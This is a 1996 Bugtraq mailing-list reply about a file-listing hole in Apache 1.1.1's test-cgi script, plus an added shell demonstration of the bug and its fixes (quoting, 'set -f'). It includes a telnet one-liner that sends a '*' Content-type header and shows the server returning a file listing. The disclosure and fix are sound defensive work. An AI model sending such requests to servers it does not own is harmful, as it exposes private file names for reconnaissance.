[3737] in bugtraq

Re: Vulnerability in test-cgi

daemon@ATHENA.MIT.EDU (Joe Zbiciak)
Wed Dec 4 12:52:08 1996

X-Apparently-From: "Not Your Average Joe [tm]" <im14u2c@cegt201.bradley.edu>
X-Apparently-To: You@Wherever.You.Are
Date:         Tue, 3 Dec 1996 22:17:18 -0600
Reply-To: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
From: Joe Zbiciak <im14u2c@cegt201.bradley.edu>
X-To:         era@ucar.edu
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <199612031928.MAA07296@niwot.scd.ucar.EDU> from "Ed Arnold" at
              Dec 3, 96 12:28:22 pm

And then Ed Arnold went and said something like this:

|
|Another data point for anyone out there running Apache ... test-cgi
|in the apache-1.1.1 distribution already has the required
|
|echo QUERY_STRING = "$QUERY_STRING"
|

However, it does not have the necessary quotes around the "$CONTENT_TYPE"
string.  Therefore it's still vulnerable in its default configuration.
Adding "set -f" as the second line of the script closes the hole completely.

(www) frankenstein:~$ (echo POST /cgi-bin/test-cgi HTTP/1.0; echo Content-type: \* ; echo Content-length: 0; echo; sleep 5) | telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HTTP/1.0 200 OK
Date: Wed, 04 Dec 1996 04:11:15 GMT
Server: Apache/1.1.1
Content-type: text/plain

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = Apache/1.1.1
SERVER_NAME = frankenstein.asylum.net
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = POST
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
REMOTE_HOST = localhost
REMOTE_ADDR = 127.0.0.1
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE = (bunch of files listed here, whose names I don't care to share)
CONTENT_LENGTH = 0
Connection closed by foreign host.
(www) frankenstein:~$
--
:======= Joe Zbiciak =======:      Bonehead Quotes of 1992 (5 of 14)
:- - im14u2c@bradley.edu - -:"Until recently the word facist was considered
: - - - - - http: - - - - - : shameful. Fortunately that time has passed.
://ee1.bradley.edu/~im14u2c/: In fact, there is now a reassessment of how
:======= DISCLAIMER: =======: much Grandpa Benito did for Italy."
:   It's all right... -  - -- -- Alessandra Mussolini, announcing her plan
-- -  -   I didn't do it!   :    to run for parliament as a neofascist
(462:834 11:15)
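
The three behaviours discussed in this thread side by side, as an added example that is not part of the original post or of the Apache test-cgi script: the unquoted echo from test-cgi, Ed Arnold's quoted form, and Joe's "set -f" fix. The scratch directory, the function names and the demo-*.cgi file names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): reproduces the test-cgi glob
# expansion bug offline. A CGI environment variable containing "*" is
# expanded against the working directory when echoed unquoted; quoting
# the variable, or "set -f" (noglob), stops the expansion.

# Constructed scratch directory standing in for the server's cgi-bin.
DEMO_DIR=$(mktemp -d)
: > "$DEMO_DIR/demo-a.cgi"
: > "$DEMO_DIR/demo-b.cgi"

# The Apache 1.1.1 test-cgi line as shipped: the variable is unquoted,
# so the shell word-splits it and then performs pathname expansion.
unquoted_echo() {
    ( cd "$DEMO_DIR" && echo CONTENT_TYPE = $CONTENT_TYPE )
}

# The fix applied to QUERY_STRING in 1.1.1: quote the expansion.
quoted_echo() {
    ( cd "$DEMO_DIR" && echo CONTENT_TYPE = "$CONTENT_TYPE" )
}

# Joe's fix: "set -f" as the second line of the script disables pathname
# expansion for the whole script, covering any variable left unquoted.
noglob_echo() {
    ( set -f; cd "$DEMO_DIR" && echo CONTENT_TYPE = $CONTENT_TYPE )
}

# The header value from the telnet session above, as the web server would
# hand it to the script in the CONTENT_TYPE environment variable.
CONTENT_TYPE='*'
export CONTENT_TYPE

unquoted_echo   # CONTENT_TYPE = demo-a.cgi demo-b.cgi  (directory listing leaks)
quoted_echo     # CONTENT_TYPE = *
noglob_echo     # CONTENT_TYPE = *
```

Every script that echoes CGI variables needs the same check: a `*` or `?` in any header-derived value must come out literally, not as a file list.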